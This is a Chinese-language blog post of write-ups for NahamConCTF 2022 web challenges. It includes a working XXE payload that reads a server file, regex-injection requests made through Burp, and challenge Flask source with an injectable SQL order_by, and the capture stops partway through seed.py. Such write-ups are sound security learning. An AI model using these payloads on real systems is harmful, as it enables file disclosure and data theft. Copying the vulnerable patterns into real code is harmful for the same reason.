<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="/images/icons/favicon-16x16.png?v=2.6.2" type="image/png" sizes="16x16"><link rel="icon" href="/images/icons/favicon-32x32.png?v=2.6.2" type="image/png" sizes="32x32"><meta name="description" content="wp&amp;#x89C6;&amp;#x9891;     NahamConCTF 2022: Web Challenge Walkthroughs - YouTube">
<meta property="og:type" content="article">
<meta property="og:title" content="4.30wp">
<meta property="og:url" content="http://example.com/2022/04/30/4-30wp/index.html">
<meta property="og:site_name" content="Clutter Box">
<meta property="og:description" content="wp&amp;#x89C6;&amp;#x9891;     NahamConCTF 2022: Web Challenge Walkthroughs - YouTube">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2022/04/30/4-30wp/image-20220430163306483.png">
<meta property="og:image" content="http://example.com/2022/04/30/4-30wp/image-20220501133403776.png">
<meta property="og:image" content="http://example.com/2022/04/30/4-30wp/image-20220501133635532.png">
<meta property="og:image" content="http://example.com/2022/04/30/4-30wp/4-30wp/image-20220501135426748.png">
<meta property="og:image" content="http://example.com/2022/04/30/4-30wp/image-20220501141411342.png">
<meta property="og:image" content="http://example.com/2022/04/30/4-30wp/4-30wp/image-20220502235019395.png">
<meta property="og:image" content="http://example.com/2022/04/30/4-30wp/4-30wp/image-20220502234947711.png">
<meta property="og:image" content="http://example.com/2022/04/30/4-30wp/image-20220503003640169.png">
<meta property="og:image" content="http://example.com/2022/04/30/4-30wp/4-30wp.assets/image-20220503003708436.png">
<meta property="article:published_time" content="2022-04-30T08:30:43.000Z">
<meta property="article:modified_time" content="2022-06-20T08:36:41.594Z">
<meta property="article:author" content="Kirsten Carton">
<meta property="article:tag" content="web">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2022/04/30/4-30wp/image-20220430163306483.png"><title>4.30wp | Clutter Box</title><link ref="canonical" href="http://example.com/2022/04/30/4-30wp/"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.12.1/css/all.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.6.2"><script>var Stun = window.Stun || {};
var CONFIG = {
  root: '/',
  algolia: undefined,
  assistSearch: undefined,
  fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
  sidebar: {"offsetTop":"20px","tocMaxDepth":6},
  header: {"enable":true,"showOnPost":true,"scrollDownIcon":false},
  postWidget: {"endText":true},
  nightMode: {"enable":true},
  back2top: {"enable":true},
  codeblock: {"style":"default","highlight":"light","wordWrap":false},
  reward: false,
  fancybox: false,
  zoomImage: {"gapAside":"20px"},
  galleryWaterfall: undefined,
  lazyload: false,
  pjax: undefined,
  externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
  shortcuts: undefined,
  prompt: {"copyButton":"Copy","copySuccess":"Copy Success","copyError":"Copy Error"},
  sourcePath: {"js":"js","css":"css","images":"images"},
};

window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 6.0.0"></head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner"><nav class="header-nav header-nav--fixed"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">Home</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/archives/"><span class="header-nav-menu-item__icon"><i class="fas fa-folder-open"></i></span><span class="header-nav-menu-item__text">Archives</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/categories/"><span class="header-nav-menu-item__icon"><i class="fas fa-layer-group"></i></span><span class="header-nav-menu-item__text">Categories</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/tags/"><span class="header-nav-menu-item__icon"><i class="fas fa-tags"></i></span><span class="header-nav-menu-item__text">Tags</span></a></div></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav><div class="header-banner"><div class="header-banner-info"><div class="header-banner-info__title">Clutter Box</div><div class="header-banner-info__subtitle"></div></div></div></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content" id="content"><!-- Just used to judge whether it is an article page--><div id="is-post"></div><div class="post"><header class="post-header"><h1 class="post-title">4.30wp</h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">Created</span><span class="post-meta-item__value">2022-04-30</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">Updated</span><span class="post-meta-item__value">2022-06-20</span></span></div></header><div class="post-body"><p> wp&#x89C6;&#x9891;     <span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://www.youtube.com/watch?v=ttsFRYkL8wQ">NahamConCTF 2022: Web Challenge Walkthroughs - YouTube</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<span id="more"></span>


        <h2 id="Jurassic-Park">
          <a href="#Jurassic-Park" class="heading-link"><i class="fas fa-link"></i></a><a href="#Jurassic-Park" class="headerlink" title="Jurassic Park"></a>Jurassic Park</h2>
      <p>&#x4F7F;&#x7528;dirsearch&#x8FDB;&#x884C;&#x626B;&#x63CF;&#xFF08;&#x6CE8;&#x610F;<code>-e*</code>&#x4E0E;&#x524D;&#x9762;url&#x6709;&#x4E2A;&#x7A7A;&#x683C;&#xFF09;</p>
<img src="/2022/04/30/4-30wp/image-20220430163306483.png" alt="image-20220430163306483" style="zoom:33%;">

<p>&#x5176;&#x4E2D;&#x7684;<code>/robots.txt</code>&#x662F;&#x4E00;&#x4E2A;&#x722C;&#x866B;&#x7684;&#x4E00;&#x4E2A;&#x534F;&#x8BAE;&#xFF0C;&#x91CC;&#x9762;&#x9650;&#x5236;&#x4E86;&#x4E00;&#x4E9B;&#x4E0D;&#x80FD;&#x88AB;&#x626B;&#x63CF;&#x5230;&#x7684;&#x8DEF;&#x5F84;&#xFF0C;</p>
<p>&#x653E;&#x5230;url&#x540E;&#x9762;&#xFF0C;&#x51FA;&#x73B0;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">User-agent: *</span><br><span class="line">Disallow: /ingen/</span><br></pre></td></tr></table></div></figure>

<p>&#x8BBF;&#x95EE;<code>/ingen/</code>&#x8DEF;&#x5F84;&#xFF0C;&#x5C31;&#x53EF;&#x4EE5;&#x5F97;&#x5230;flag</p>

        <h2 id="extravagant">
          <a href="#extravagant" class="heading-link"><i class="fas fa-link"></i></a><a href="#extravagant" class="headerlink" title="extravagant"></a>extravagant</h2>
      <p>xml&#x6587;&#x4EF6;&#x4E0A;&#x4F20;</p>
<p>&#x6253;&#x5F00;&#x8BB0;&#x4E8B;&#x672C;&#xFF0C;&#x5199;&#x5982;&#x4E0B;&#x8BED;&#x53E5;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;!--?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?--&gt;</span><br><span class="line">&lt;!DOCTYPE foo [&lt;!ENTITY flag SYSTEM &quot;/var/www/flag.txt&quot; &gt; ]&gt;</span><br><span class="line">&lt;data&gt;&amp;flag;&lt;/data&gt;</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<p>&#x4FDD;&#x5B58;&#x4E3A;2.xml&#x7136;&#x540E;&#x4E0A;&#x4F20;</p>
<p>&#x5728;trials&#x4E2D;&#x4E0A;&#x4F20;&#xFF0C;&#x5728;view xml&#x4E2D;&#x8BBF;&#x95EE;&#xFF0C;&#x5C31;&#x53EF;&#x4EE5;&#x5F97;&#x5230;flag</p>

        <h2 id="personnel">
          <a href="#personnel" class="heading-link"><i class="fas fa-link"></i></a><a href="#personnel" class="headerlink" title="personnel"></a>personnel</h2>
      <p>&#x8FD9;&#x91CC;&#x4F7F;&#x7528;&#x7684;&#x662F;&#x4EC0;&#x4E48;&#x2026;</p>
<img src="/2022/04/30/4-30wp/image-20220501133403776.png" alt="image-20220501133403776" style="zoom:33%;">

<p>&#x8F93;&#x5165;&#x5B57;&#x6BCD;&#x4F1A;&#x6709;&#x56DE;&#x663E;&#xFF0C;&#x4F46;&#x662F;&#x8F93;&#x5165;&#x6570;&#x5B57;&#x4E0D;&#x4F1A;&#x6709;&#x56DE;&#x663E;&#xFF0C;&#x4F7F;&#x7528;<code>,*</code>&#x4F1A;&#x56DE;&#x663E;&#x6240;&#x6709;&#x7684;&#x540D;&#x5B57;</p>
<p>&#x4E8E;&#x662F;&#x4F7F;&#x7528;burp&#x6293;&#x5305;&#xFF0C;&#x5728;repeater&#x91CC;&#x9762;</p>
<img src="/2022/04/30/4-30wp/image-20220501133635532.png" alt="image-20220501133635532" style="zoom:50%;">

<p>&#x4FEE;&#x6539;setting&#x4E3A;1&#xFF0C;name&#x4F7F;&#x7528;<code>.*</code></p>
<p>&#x5C31;&#x6709;&#x4E86;</p>
<p>&#x95EE;&#x9898;&#x662F;&#xFF0C;&#x8FD9;&#x91CC;&#x4F7F;&#x7528;&#x7684;&#x662F;&#x4EC0;&#x4E48;&#x2026;</p>
<hr>
<p>grep (global search regular expression (RE) and print out the line,&#x5168;&#x9762;&#x641C;&#x7D22;&#x6B63;&#x5219;&#x8868;&#x8FBE;&#x5F0F;&#x5E76;&#x628A;&#x884C;&#x6253;&#x5370;&#x51FA;&#x6765;)&#x662F;&#x4E00;&#x79CD;&#x5F3A;&#x5927;&#x7684;&#x6587;&#x672C;&#x641C;&#x7D22;&#x5DE5;&#x5177;</p>
<hr>
<p><a href="%5B(9%E6%9D%A1%E6%B6%88%E6%81%AF">&#x5173;&#x4E8E;burp&#x91CC;&#x9762;&#x7684;intruder&#x7684;&#x8BE6;&#x7EC6;&#x4ECB;&#x7ECD;</a> Burp Suite&#x4E2D;Intruder&#x6A21;&#x5757;&#x7684;&#x4F7F;&#x7528;&#x8BE6;&#x89E3;_Senimo_&#x7684;&#x535A;&#x5BA2;-CSDN&#x535A;&#x5BA2;_burp intruder](<span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_44037296/article/details/102781785">https://blog.csdn.net/weixin_44037296/article/details/102781785</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span>))</p>
<p><img src="/2022/04/30/4-30wp/4-30wp/image-20220501135426748.png" alt="image-20220501135426748"></p>
<p>&#x91CC;&#x9762;&#x5C06;name&#x6362;&#x6210;<code>.</code>&#x5C31;&#x53EF;&#x4EE5;&#x5339;&#x914D;&#x4E00;&#x5207;&#x5B57;&#x7B26;</p>
<p>&#x7B2C;&#x4E8C;&#x79CD;&#x65B9;&#x6CD5;&#x662F;&#x4F7F;&#x7528;intruder&#x6A21;&#x5757;&#xFF0C;&#x6DFB;&#x52A0;grep&#x7684;flag&#xFF0C;&#x8BBE;&#x7F6E;&#x7EBF;&#x7A0B;&#x4E4B;&#x7C7B;&#x7684;&#x5373;&#x53EF;</p>
<img src="/2022/04/30/4-30wp/image-20220501141411342.png" alt="image-20220501141411342" style="zoom:50%;">

<p>&#x4F3C;&#x4E4E;&#x662F;&#x7ED9;&#x4E86;&#x6E90;&#x7801;</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, Response, abort, request, render_template</span><br><span class="line"><span class="keyword">import</span> random</span><br><span class="line"><span class="keyword">from</span> string <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line">flag = <span class="built_in">open</span>(<span class="string">&quot;flag.txt&quot;</span>).read()</span><br><span class="line">users = <span class="built_in">open</span>(<span class="string">&quot;users.txt&quot;</span>).read()</span><br><span class="line"></span><br><span class="line">users += flag</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&quot;/&quot;</span>, methods=[<span class="string">&quot;GET&quot;</span>, <span class="string">&quot;POST&quot;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line">    <span class="keyword">if</span> request.method == <span class="string">&quot;GET&quot;</span>:</span><br><span class="line">        <span class="keyword">return</span> render_template(<span class="string">&quot;lookup.html&quot;</span>)</span><br><span class="line">    <span class="keyword">if</span> request.method == <span class="string">&quot;POST&quot;</span>:</span><br><span class="line">        name = request.form[<span class="string">&quot;name&quot;</span>]</span><br><span class="line">        setting = <span class="built_in">int</span>(request.form[<span class="string">&quot;setting&quot;</span>])</span><br><span class="line">        <span class="keyword">if</span> name:</span><br><span class="line">            <span class="keyword">if</span> name[<span class="number">0</span>].isupper():</span><br><span class="line">                name = name[<span class="number">1</span>:]</span><br><span class="line"></span><br><span class="line">        results = re.findall(<span class="string">r&quot;[A-Z][a-z]*?&quot;</span> + name + <span class="string">r&quot;[a-z]*?\n&quot;</span>, users, setting)</span><br><span class="line">        results = [x.strip() <span class="keyword">for</span> x <span class="keyword">in</span> results <span class="keyword">if</span> x <span class="keyword">or</span> <span class="built_in">len</span>(x) &gt; <span class="number">1</span>]</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> render_template(<span class="string">&quot;lookup.html&quot;</span>, passed_results=<span class="literal">True</span>, results=results)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    app.run()</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>




        <h2 id="flaskmetal-alchemist">
          <a href="#flaskmetal-alchemist" class="heading-link"><i class="fas fa-link"></i></a><a href="#flaskmetal-alchemist" class="headerlink" title="flaskmetal alchemist"></a>flaskmetal alchemist</h2>
      <p>&#x4E0B;&#x8F7D;zip&#x6709;&#x6E90;&#x7801;</p>
<p>&#x7B2C;&#x4E00;&#x4E2A;&#x662F;app.py</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, render_template, request, url_for, redirect</span><br><span class="line"><span class="keyword">from</span> models <span class="keyword">import</span> Metal</span><br><span class="line"><span class="keyword">from</span> database <span class="keyword">import</span> db_session, init_db</span><br><span class="line"><span class="keyword">from</span> seed <span class="keyword">import</span> seed_db</span><br><span class="line"><span class="keyword">from</span> sqlalchemy <span class="keyword">import</span> text</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.teardown_appcontext</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">shutdown_session</span>(<span class="params">exception=<span class="literal">None</span></span>):</span><br><span class="line">    db_session.remove()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&quot;/&quot;</span>, methods=[<span class="string">&quot;GET&quot;</span>, <span class="string">&quot;POST&quot;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line">    <span class="keyword">if</span> request.method == <span class="string">&quot;POST&quot;</span>:</span><br><span class="line">        search = <span class="string">&quot;&quot;</span></span><br><span class="line">        order = <span class="literal">None</span></span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;search&quot;</span> <span class="keyword">in</span> request.form:</span><br><span class="line">            search = request.form[<span class="string">&quot;search&quot;</span>]</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;order&quot;</span> <span class="keyword">in</span> request.form:</span><br><span class="line">            order = request.form[<span class="string">&quot;order&quot;</span>]</span><br><span class="line">        <span class="keyword">if</span> order <span class="keyword">is</span> <span class="literal">None</span>:</span><br><span class="line">            metals = Metal.query.<span class="built_in">filter</span>(Metal.name.like(<span class="string">&quot;%{}%&quot;</span>.<span class="built_in">format</span>(search)))</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            metals = Metal.query.<span class="built_in">filter</span>(</span><br><span class="line">                Metal.name.like(<span class="string">&quot;%{}%&quot;</span>.<span class="built_in">format</span>(search))</span><br><span class="line">            ).order_by(text(order))</span><br><span class="line">        <span class="keyword">return</span> render_template(<span class="string">&quot;home.html&quot;</span>, metals=metals)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        metals = Metal.query.<span class="built_in">all</span>()</span><br><span class="line">        <span class="keyword">return</span> render_template(<span class="string">&quot;home.html&quot;</span>, metals=metals)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    seed_db()</span><br><span class="line">    app.run(debug=<span class="literal">False</span>)</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<p>&#x7B2C;&#x4E8C;&#x4E2A;&#x662F;database.py</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> sqlalchemy <span class="keyword">import</span> create_engine</span><br><span class="line"><span class="keyword">from</span> sqlalchemy.orm <span class="keyword">import</span> scoped_session, sessionmaker</span><br><span class="line"><span class="keyword">from</span> sqlalchemy.ext.declarative <span class="keyword">import</span> declarative_base</span><br><span class="line"></span><br><span class="line">engine = create_engine(<span class="string">&quot;sqlite:////tmp/test.db&quot;</span>)</span><br><span class="line">db_session = scoped_session(</span><br><span class="line">    sessionmaker(autocommit=<span class="literal">False</span>, autoflush=<span class="literal">False</span>, bind=engine)</span><br><span class="line">)</span><br><span class="line">Base = declarative_base()</span><br><span class="line">Base.query = db_session.query_property()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">init_db</span>():</span><br><span class="line">    Base.metadata.create_all(bind=engine)</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<p>&#x7B2C;&#x4E09;&#x4E2A;&#x662F;models.py</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> database <span class="keyword">import</span> Base</span><br><span class="line"><span class="keyword">from</span> sqlalchemy <span class="keyword">import</span> Column, Integer, String</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Metal</span>(<span class="title class_ inherited__">Base</span>):</span><br><span class="line">    __tablename__ = <span class="string">&quot;metals&quot;</span></span><br><span class="line">    atomic_number = Column(Integer, primary_key=<span class="literal">True</span>)</span><br><span class="line">    symbol = Column(String(<span class="number">3</span>), unique=<span class="literal">True</span>, nullable=<span class="literal">False</span>)</span><br><span class="line">    name = Column(String(<span class="number">40</span>), unique=<span class="literal">True</span>, nullable=<span class="literal">False</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self, atomic_number=<span class="literal">None</span>, symbol=<span class="literal">None</span>, name=<span class="literal">None</span></span>):</span><br><span class="line">        self.atomic_number = atomic_number</span><br><span class="line">        self.symbol = symbol</span><br><span class="line">        self.name = name</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Flag</span>(<span class="title class_ inherited__">Base</span>):</span><br><span class="line">    __tablename__ = <span class="string">&quot;flag&quot;</span></span><br><span class="line">    flag = Column(String(<span class="number">40</span>), primary_key=<span class="literal">True</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self, flag=<span class="literal">None</span></span>):</span><br><span class="line">        self.flag = flag</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<p>&#x7B2C;&#x56DB;&#x4E2A;&#x662F;seed.py</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> models <span class="keyword">import</span> Metal, Flag</span><br><span class="line"><span class="keyword">from</span> database <span class="keyword">import</span> db_session, init_db</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">seed_db</span>():</span><br><span class="line">    init_db()</span><br><span class="line">    metals = [</span><br><span class="line">        Metal(<span class="number">3</span>, <span class="string">&quot;Li&quot;</span>, <span class="string">&quot;Lithium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">4</span>, <span class="string">&quot;Be&quot;</span>, <span class="string">&quot;Beryllium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">11</span>, <span class="string">&quot;Na&quot;</span>, <span class="string">&quot;Sodium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">12</span>, <span class="string">&quot;Mg&quot;</span>, <span class="string">&quot;Magnesium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">13</span>, <span class="string">&quot;Al&quot;</span>, <span class="string">&quot;Aluminum&quot;</span>),</span><br><span class="line">        Metal(<span class="number">19</span>, <span class="string">&quot;K&quot;</span>, <span class="string">&quot;Potassium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">20</span>, <span class="string">&quot;Ca&quot;</span>, <span class="string">&quot;Calcium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">21</span>, <span class="string">&quot;Sc&quot;</span>, <span class="string">&quot;Scandium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">22</span>, <span class="string">&quot;Ti&quot;</span>, <span class="string">&quot;Titanium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">23</span>, <span class="string">&quot;V&quot;</span>, <span class="string">&quot;Vanadium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">24</span>, <span class="string">&quot;Cr&quot;</span>, <span class="string">&quot;Chromium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">25</span>, <span class="string">&quot;Mn&quot;</span>, <span class="string">&quot;Manganese&quot;</span>),</span><br><span class="line">        Metal(<span class="number">26</span>, <span class="string">&quot;Fe&quot;</span>, <span class="string">&quot;Iron&quot;</span>),</span><br><span class="line">        Metal(<span class="number">27</span>, <span class="string">&quot;Co&quot;</span>, <span class="string">&quot;Cobalt&quot;</span>),</span><br><span class="line">        Metal(<span class="number">28</span>, <span class="string">&quot;Ni&quot;</span>, <span class="string">&quot;Nickel&quot;</span>),</span><br><span class="line">        Metal(<span class="number">29</span>, <span class="string">&quot;Cu&quot;</span>, <span class="string">&quot;Copper&quot;</span>),</span><br><span class="line">        Metal(<span class="number">30</span>, <span class="string">&quot;Zn&quot;</span>, <span class="string">&quot;Zinc&quot;</span>),</span><br><span class="line">        Metal(<span class="number">31</span>, <span class="string">&quot;Ga&quot;</span>, <span class="string">&quot;Gallium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">37</span>, <span class="string">&quot;Rb&quot;</span>, <span class="string">&quot;Rubidium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">38</span>, <span class="string">&quot;Sr&quot;</span>, <span class="string">&quot;Strontium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">39</span>, <span class="string">&quot;Y&quot;</span>, <span class="string">&quot;Yttrium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">40</span>, <span class="string">&quot;Zr&quot;</span>, <span class="string">&quot;Zirconium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">41</span>, <span class="string">&quot;Nb&quot;</span>, <span class="string">&quot;Niobium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">42</span>, <span class="string">&quot;Mo&quot;</span>, <span class="string">&quot;Molybdenum&quot;</span>),</span><br><span class="line">        Metal(<span class="number">43</span>, <span class="string">&quot;Tc&quot;</span>, <span class="string">&quot;Technetium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">44</span>, <span class="string">&quot;Ru&quot;</span>, <span class="string">&quot;Ruthenium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">45</span>, <span class="string">&quot;Rh&quot;</span>, <span class="string">&quot;Rhodium&quot;</span>),</span><br><span class="line">        Metal(<span class="number">46</span>, <span class="string">&quot;Pd&quot;</span>, 